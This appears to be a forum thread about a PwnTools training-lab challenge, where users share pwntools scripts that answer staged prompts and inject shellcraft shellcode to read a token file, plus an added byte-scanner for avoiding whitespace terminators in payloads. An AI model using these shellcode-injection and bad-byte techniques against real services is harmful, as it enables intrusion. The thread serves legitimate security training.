Forum Discussion
I think there are some steps missing in your code. Go up, take the provided code and make the adjustments in the replies, and it should work.
Thanks for coming back to me. Sorry, I removed some of the steps for brevity, but this is the full code that works fine locally but not through the remote connection:
from pwn import *

context.arch = 'amd64'
context.os = 'linux'


def main():
    # Local process; swap in the remote() line to run against the network service.
    r_tube = process("/opt/demonstrate-challenge")
    #r_tube = remote("127.0.0.1", 1234)

    print("Stage 1")
    # Prompt has the form "What is the sum of A and B?"; reply with A+B as text.
    r_tube.recvuntil(b"What is the sum of")
    line = r_tube.recvline().decode()
    nums = [int(x) for x in line.strip().replace('?', '').split(' and ')]
    answer = nums[0] + nums[1]
    r_tube.sendline(str(answer).encode())

    print("Stage 2")
    # Two integers on the line after the ':' prompt, sent back as raw little-endian u32s.
    r_tube.recvuntil(b':')
    r_tube.recvline()
    line = r_tube.recvline().decode().strip()
    val1, val2 = [int(x) for x in line.split(" and ")]
    packed = p32(val1) + p32(val2)
    r_tube.send(packed)

    print("Stage 3")
    # Address of parsing_check from the binary's symbol table, sent as a decimal string.
    elf = ELF('/opt/demonstrate-challenge')
    parsing_check_addr = elf.symbols['parsing_check']
    r_tube.sendline(str(parsing_check_addr).encode())

    print("Stage 4")
    # cat2 writes token.txt to fd 1 (up to 40 bytes), then ret with rax = 0.
    shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
    shellcode = asm(shellcode)
    r_tube.send(shellcode)
    data = r_tube.recvall(5)
    print(hexdump(data))


if __name__ == "__main__":
    main()
Again I get a SegFault with this, and copying the code above I get a SegFault too, and both of them provide the token.txt locally but not through the remote connection.
- IotS2024, 2 months ago
Bronze III
Okay :) For me the following worked (just a part):
from pwn import *

# Generate shellcode to read the file using pwntools shellcraft
context.arch = "amd64"
# Generate shellcode using shellcraft to read file and print the content as hex
shellcode = asm(shellcraft.cat2("/home/token-user/token.txt"))
# Print out the shellcode in hexadecimal for easy inspection
print("Generated Shellcode:")
print(shellcode.hex())  # Print shellcode in hex format for debugging
# Send the shellcode payload (conn is the pwntools tube opened earlier, not shown here)
conn.sendline(shellcode)
I tried a lot of different approaches until I found this one. Try it out.
It is the arch and an easier shellcode generation.
- talnet23, 2 months ago
Bronze I
Ok, my brain hurts! Running that code locally on my machine through socat or through spawning a local process, nothing. However, when running it in the Immersive Labs environment, I get the token back. At least others have been able to work that out. Thanks, completed PwnTools now.
- netcat, 2 months ago
Silver II
I had to use encode to get rid of tab, space and other characters.
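One check worth running before sending a shellcraft payload, given the last reply's note about tabs, spaces and other characters: scan the raw bytes for characters that a whitespace-delimited reader (a scanf("%s")-style or tokenizing input routine) would treat as a terminator, so a payload that works with a local process but is truncated over a different transport shows up before you send it. This is an added example, not code from any of the posters or from the challenge; the terminator set is an assumption to be matched against the real target's input routine, the sample shellcode bytes are constructed for the example, and the pwntools path runs only if pwntools is installed.

```python
import struct

# Assumed set of bytes a whitespace-delimited reader stops at: NUL plus the
# C isspace() characters. Replace with whatever the target's reader rejects.
WHITESPACE_TERMINATORS = frozenset(b"\x00\t\n\x0b\x0c\r ")


def find_bad_bytes(payload: bytes, bad=WHITESPACE_TERMINATORS):
    """Return (offset, byte) pairs for every byte in payload that is in bad."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def framed_length(payload: bytes, bad=WHITESPACE_TERMINATORS):
    """How many bytes survive if the reader stops at the first bad byte."""
    for i, b in enumerate(payload):
        if b in bad:
            return i
    return len(payload)


def pack_stage2(val1: int, val2: int) -> bytes:
    """Same layout as p32(val1) + p32(val2) in the thread's script, without pwntools.
    Small values always contain NUL bytes, which is why that stage must go over
    a raw send() and never through a text-oriented reader."""
    return struct.pack("<II", val1, val2)


# Constructed sample (not the real cat2 output):
#   48 31 c0   xor rax, rax
#   6a 20      push 0x20      <- 0x20 is an ASCII space
#   58         pop rax
#   0f 05      syscall
SAMPLE_SHELLCODE = bytes.fromhex("4831c06a20580f05")


def audit_shellcraft_cat2(path="/home/token-user/token.txt"):
    """Run the same scan over real shellcraft.cat2 output when pwntools is
    available; returns None otherwise so the example still runs offline."""
    try:
        from pwn import asm, context, shellcraft
    except ImportError:
        return None
    context.arch = "amd64"
    context.os = "linux"
    sc = asm(shellcraft.cat2(path))
    return find_bad_bytes(sc)


if __name__ == "__main__":
    for label, payload in [("sample shellcode", SAMPLE_SHELLCODE),
                           ("stage 2 packed", pack_stage2(1, 2))]:
        hits = find_bad_bytes(payload)
        print(f"{label}: {len(payload)} bytes, "
              f"{framed_length(payload)} survive a whitespace reader, "
              f"bad bytes at {[(i, hex(b)) for i, b in hits]}")
    real = audit_shellcraft_cat2()
    if real is not None:
        print(f"shellcraft.cat2: bad bytes at {[(i, hex(b)) for i, b in real]}")
```

If the scan reports hits, the choice is between a transport that delivers raw bytes unchanged (send() over a socket that is read with read()/recv()) and re-encoding the payload so no terminator byte appears; sendline() is worth remembering here too, since it appends 0x0a, which is itself in the terminator set.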